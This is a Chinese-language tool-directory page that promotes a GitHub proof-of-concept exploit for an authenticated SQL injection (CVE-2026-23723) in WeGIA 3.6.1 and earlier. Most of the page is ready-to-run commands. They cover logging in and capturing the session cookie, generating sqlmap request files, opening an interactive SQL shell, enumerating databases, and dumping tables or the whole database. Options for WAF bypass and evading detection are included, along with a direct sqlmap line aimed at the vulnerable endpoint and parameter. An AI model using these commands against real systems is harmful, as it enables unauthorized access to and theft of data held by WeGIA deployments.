Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-23723-POC — 这是一个轻量级 Python 辅助脚本,旨在自动生成与 sqlmap 兼容的 PoC 文件,用于 WeGIA(≤ 3.6.1)中经身份验证的基于错误的 SQL 注入漏洞,该漏洞编号为 GHSA-xfmp-2hf9-gfjp。 | Kitploit
工具/GitHubGitHub/ch35h1r3c47/cve-2026-23723-poc
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubch35h1r3c47/cve-2026-23723-poc

CVE-2026-23723-POC

这是一个轻量级 Python 辅助脚本,旨在自动生成与 sqlmap 兼容的 PoC 文件,用于 WeGIA(≤ 3.6.1)中经身份验证的基于错误的 SQL 注入漏洞,该漏洞编号为 GHSA-xfmp-2hf9-gfjp。

查看仓库
316个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-23723 PoC - WeGIA 认证 SQL 注入漏洞利用辅助工具

WeGIA ≤ 3.6.1 中的认证错误型 SQL 注入
GHSA-xfmp-2hf9-gfjp | 官方公告

PoC 原作者 / 报告者:ViniCastro2001 GHSA 发布者:nilsonLazarin(项目维护者)

这个轻量级 Python 脚本可自动化执行:

  • 使用提供的凭据登录 WeGIA 系统
  • 提取有效的 PHP 会话 Cookie
  • 生成兼容 sqlmap 的请求文件(注入点标记为 id_memorando=1*)
  • 输出可直接运行的 sqlmap 命令,用于枚举、交互式 Shell 和数据导出

功能特性

  • 尝试多种常见登录路径和表单字段名称,以获得更好的兼容性
  • 生成 sqlmap 请求文件(.req)
  • 提供可直接复制粘贴的 sqlmap 命令,用于:
    • 交互式 MySQL 风格 Shell(--sql-shell)
    • 数据库 / 表枚举
    • 定向表导出或完整数据库导出

环境要求

  • Python 3.x
  • requests 库(大多数渗透测试环境已预装)
  • 已安装 sqlmap 并将其加入 PATH

安装

root@kitploit:~
git clone https://github.com/Ch35h1r3c47/CVE-2026-23723-POC.git
cd CVE-2026-23723-POC

使用方法

root@kitploit:~
# 推荐:交互式密码提示
python CVE-2026-23723.py --url http://target.com -u admin

# 直接提供密码
python CVE-2026-23723.py --url http://target.com -u admin -p wegia

# 自定义输出文件
python CVE-2026-23723.py --url http://target.com -u admin -p wegia --output custom.req

成功运行后,脚本将:

尝试登录 生成 wegia_sqlmap.req(或您的自定义文件名) 显示可直接使用的 sqlmap 命令

生成的命令示例:

root@kitploit:~
# 1. 交互式 MySQL 风格 Shell(最推荐)
sqlmap -r wegia_sqlmap.req --sql-shell --batch --dbms=mariadb

# 2. 显示当前数据库及所有数据库
sqlmap -r wegia_sqlmap.req --current-db --dbs --batch

# 3. 列出 wegia 数据库中的表
sqlmap -r wegia_sqlmap.req -D wegia --tables --batch

# 4. 导出特定表(示例:funcionario)
sqlmap -r wegia_sqlmap.req -D wegia -T funcionario --dump --threads=2 --batch

# 5. 导出整个 wegia 数据库(请谨慎操作!)
sqlmap -r wegia_sqlmap.req -D wegia --dump-all --threads=3 --batch --output-dir=./dump
可选的 sqlmap 参数:

--proxy=http://127.0.0.1:8080(通过 Burp/ZAP 代理)
--tamper=space2comment,randomcase(基础 WAF 绕过)
--delay=1(降低速度以避免被检测)

如果自动登录失败 通过浏览器手动登录 → 复制完整的 Cookie 请求头 → 直接运行 sqlmap:

root@kitploit:~
sqlmap -u "http://target.com/controle/control.php?nomeClasse=Atendido_ocorrenciaControle&metodo=listarTodosComAnexo&id_memorando=*" \
  --cookie="PHPSESSID=xxxxxxxx; other_cookie=yyy" \
  --sql-shell --batch

法律免责声明 本 PoC 仅供教育和授权渗透测试使用。 未经授权对任何系统使用均属违法行为,且被严格禁止。 作者及贡献者不对任何滥用行为或造成的损害承担责任。 参考资料

GHSA-xfmp-2hf9-gfjp CVE-2026-23723

下载工具